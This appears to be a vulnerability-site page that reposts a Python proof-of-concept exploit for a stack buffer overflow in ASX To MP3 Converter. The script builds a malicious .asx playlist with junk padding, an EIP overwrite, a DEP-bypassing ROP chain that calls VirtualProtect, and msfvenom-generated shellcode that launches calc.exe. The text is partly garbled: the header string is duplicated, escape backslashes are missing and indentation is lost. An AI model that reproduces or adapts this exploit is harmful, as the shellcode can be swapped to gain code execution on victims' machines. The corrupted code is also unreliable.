ASX To MP3 Converter Stack Overflow

Details
Category: Vulnerabilities
Hits: 400
import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''< import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

#offset 17375
junk = "A" *17375

#0x1003df8e
#0x774e1035
EIP="x36x10x4ex77"

adjust="A" *4

def create_rop_chain():

rop_gadgets = [
0x73dd5dce, # POP EAX # RETN [MFC42.DLL]
0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]
0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL]
0x7c96feb7, # POP EBP # RETN [ntdll.dll]
0x7608fcec, # & push esp # ret [MSVCP60.dll]
0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll]
0x01d64827, # POP EAX # RETN [msvos.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll]
0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll]
0x77da1d04, # &Writable location [USER32.dll]
0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll]
0x76091182, # RETN (ROP NOP) [MSVCP60.dll]
0x7d7da123, # POP EAX # RETN [WMVCore.DLL]
0x90909090, # nop
0x77195015, # PUSHAD # RETN [OLEAUT32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "x00x0ax0d EXITFUNC=seh
#badcharacters "x00x0ax0d"

buf = ""
buf += "xdaxd6xbaxf5xa4x32xf4xd9x74x24xf4x5dx31"
buf += "xc9xb1x31x83xc5x04x31x55x14x03x55xe1x46"
buf += "xc7x08xe1x05x28xf1xf1x69xa0x14xc0xa9xd6"
buf += "x5dx72x1ax9cx30x7exd1xf0xa0xf5x97xdcxc7"
buf += "xbex12x3bxe9x3fx0ex7fx68xc3x4dxacx4axfa"
buf += "x9dxa1x8bx3bxc3x48xd9x94x8fxffxcex91xda"
buf += "xc3x65xe9xcbx43x99xb9xeax62x0cxb2xb4xa4"
buf += "xaex17xcdxecxa8x74xe8xa7x43x4ex86x39x82"
buf += "x9fx67x95xebx10x9axe7x2cx96x45x92x44xe5"
buf += "xf8xa5x92x94x26x23x01x3exacx93xedxbfx61"
buf += "x45x65xb3xcex01x21xd7xd1xc6x59xe3x5axe9"
buf += "x8dx62x18xcex09x2fxfax6fx0bx95xadx90x4b"
buf += "x76x11x35x07x9ax46x44x4axf0x99xdaxf0xb6"
buf += "x9axe4xfaxe6xf2xd5x71x69x84xe9x53xcex74"
buf += "x1bx6exdaxe1x82x1bxa7x6fx35xf6xebx89xb6"
buf += "xf3x93x6dxa6x71x96x2ax60x69xeax23x05x8d"
buf += "x59x43x0cxeex3cxd7xccxdfxdbx5fx76x20"

shellcode="S"*10+buf

print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)

print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))

garbage= "C" *8303

foot ='''_playlis.wma"/>
</Entry>
</ASX>'''

payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot

fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()